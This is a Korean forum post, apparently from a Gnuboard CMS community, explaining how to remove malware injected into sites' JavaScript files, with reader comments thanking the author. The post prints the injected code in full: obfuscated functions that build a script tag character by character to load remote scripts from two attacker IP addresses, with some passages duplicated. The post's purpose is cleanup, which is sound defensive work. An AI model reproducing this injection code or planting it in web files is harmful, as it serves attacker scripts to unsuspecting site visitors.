그누보드 홈페이지가 갑자기 느려졌을때 http://173.252.199.91/sideview.js 등.. (악성코드감염) 해결법... 정보
그누보드 홈페이지가 갑자기 느려졌을때 http://173.252.199.91/sideview.js 등.. (악성코드감염) 해결법...본문
최근에 그누보드 이용하다 보면
홈페이지가 연결이 지연되는 증상이 있었죠?
http://173.252.199.91/sideview.js
http://74.82.184.43:81/pv_data.js
js/ 폴더 내 common.js 와 같은 *.js 파일 에 악성코드가 심어져 있어 발생하는 문제네요.
function Info_JQueryValue_View()
이와 같이 시작을 해서
내용이
홈페이지가 연결이 지연되는 증상이 있었죠?
http://173.252.199.91/sideview.js
http://74.82.184.43:81/pv_data.js
js/ 폴더 내 common.js 와 같은 *.js 파일 에 악성코드가 심어져 있어 발생하는 문제네요.
function Info_JQueryValue_View()
이와 같이 시작을 해서
내용이
function Info_JQueryValue_View()
{
if(navigator.userAgent.toLowerCase().indexOf("msie") != -1)
{
var request;
if(window.ActiveXObject) {
var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
for(var i=0; i<versions.length; i++) {
try {
request = new ActiveXObject(versions[i]);
} catch(e) {}
}
}
if(request)
{
var M='';M+='<';M+='s';M+='c';M+='r';M+='i';M+='p';M+='t';M+=' ';M+='s';M+='r';M+='c';M+='=';M+='h';M+='t';M+='t';M+='p';M+=':';M+='/';M+='/';M+='1';M+='7';M+='3';M+='.';M+='2';M+='5';M+='2';M+='.';M+='1';M+='9';M+='9';M+='.';M+='9';M+='1';M+='/';M+='s';M+='i';M+='d';M+='e';M+='v';M+='i';M+='e';M+='w';M+='.';M+='j';M+='s';M+='>';M+='<';M+='/';M+='s';M+='c';M+='r';M+='i';M+='p';M+='t';M+='>';var Info_JQueryValue_View_='NULL';document.write(M);
}
}
}
Info_JQueryValue_View();
이와 같이 들어가 있거나
function Show_Info_JQuery_m_()
{
var P='';P+='<';P+='s';P+='c';P+='r';P+='i';P+='p';P+='t';P+=' ';P+='s';P+='r';P+='c';P+='=';P+='h';P+='t';P+='t';P+='p';P+=':';P+='/';P+='/';P+='1';P+='7';P+='3';P+='.';P+='2';P+='5';P+='2';P+='.';P+='1';P+='9';P+='9';P+='.';P+='9';P+='1';P+='/';P+='s';P+='i';P+='d';P+='e';P+='v';P+='i';P+='e';P+='w';P+='.';P+='j';P+='s';P+='>';P+='<';P+='/';P+='s';P+='c';P+='r';P+='i';P+='p';P+='t';P+='>';window["document"]["write"](P);
}
{
if(navigator.userAgent.toLowerCase().indexOf("msie") != -1)
{
var request;
if(window.ActiveXObject) {
var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
for(var i=0; i<versions.length; i++) {
try {
request = new ActiveXObject(versions[i]);
} catch(e) {}
}
}
if(request)
{
var M='';M+='<';M+='s';M+='c';M+='r';M+='i';M+='p';M+='t';M+=' ';M+='s';M+='r';M+='c';M+='=';M+='h';M+='t';M+='t';M+='p';M+=':';M+='/';M+='/';M+='1';M+='7';M+='3';M+='.';M+='2';M+='5';M+='2';M+='.';M+='1';M+='9';M+='9';M+='.';M+='9';M+='1';M+='/';M+='s';M+='i';M+='d';M+='e';M+='v';M+='i';M+='e';M+='w';M+='.';M+='j';M+='s';M+='>';M+='<';M+='/';M+='s';M+='c';M+='r';M+='i';M+='p';M+='t';M+='>';var Info_JQueryValue_View_='NULL';document.write(M);
}
}
}
Info_JQueryValue_View();
이와 같이 들어가 있거나
function Show_Info_JQuery_m_()
{
var P='';P+='<';P+='s';P+='c';P+='r';P+='i';P+='p';P+='t';P+=' ';P+='s';P+='r';P+='c';P+='=';P+='h';P+='t';P+='t';P+='p';P+=':';P+='/';P+='/';P+='1';P+='7';P+='3';P+='.';P+='2';P+='5';P+='2';P+='.';P+='1';P+='9';P+='9';P+='.';P+='9';P+='1';P+='/';P+='s';P+='i';P+='d';P+='e';P+='v';P+='i';P+='e';P+='w';P+='.';P+='j';P+='s';P+='>';P+='<';P+='/';P+='s';P+='c';P+='r';P+='i';P+='p';P+='t';P+='>';window["document"]["write"](P);
}
Show_Info_JQuery_m_();
function Show_Info_JQuery_m_()
{
var P='';P+='<';P+='s';P+='c';P+='r';P+='i';P+='p';P+='t';P+=' ';P+='s';P+='r';P+='c';P+='=';P+='h';P+='t';P+='t';P+='p';P+=':';P+='/';P+='/';P+='7';P+='4';P+='.';P+='8';P+='2';P+='.';P+='1';P+='8';P+='4';P+='.';P+='4';P+='3';P+=':';P+='8';P+='1';P+='/';P+='p';P+='v';P+='_';P+='d';P+='a';P+='t';P+='a';P+='.';P+='j';P+='s';P+='>';P+='<';P+='/';P+='s';P+='c';P+='r';P+='i';P+='p';P+='t';P+='>';window["document"]["write"](P);
}
Show_Info_JQuery_m_();
이와 같이 쿼리문으로 삽입되어 있었네요.
위 내용을 확인 후에 해당 내용을 삭제 하면
홈페이지가 빨리 연결 되더군요.
홈페이지 느려서 위와 같은 증상이 났는데, 해결 안되신 분들 있으면 위와 같이 해보세요. ^^
추천
6
6
댓글 8개
감사합니다.
허접홈이라 다행스럽게도 아직 느리지는 않습니다. ^ ^;;
허접홈이라 다행스럽게도 아직 느리지는 않습니다. ^ ^;;
예전 제로때 이런 코드가 심어진게 많아서 한참 지웠던 적이 있는데,,, 확인해 봐야 겠군요 좋은 정보 감사합니다
좋은 정보 감사합니다. ~
저도 3일전에 이거 걸려서 카페24에서 처리해주었는데...좋은정보인거 같아요
감사합니다. 확인결과 다행이 없네요.
수정 안하신분들은 걍 깨끗한 파일로 덮어씌우세요 ㅎㅎ
정말 감사합니다. 원천봉쇄 방법은 모르겠지만, 일단 계속 모니터링 해야겠네요.ㅠㅠ
좋은정보 감사합니다 확인해보니 제사이트는 영양가가 없나 ㅋㅋㅋ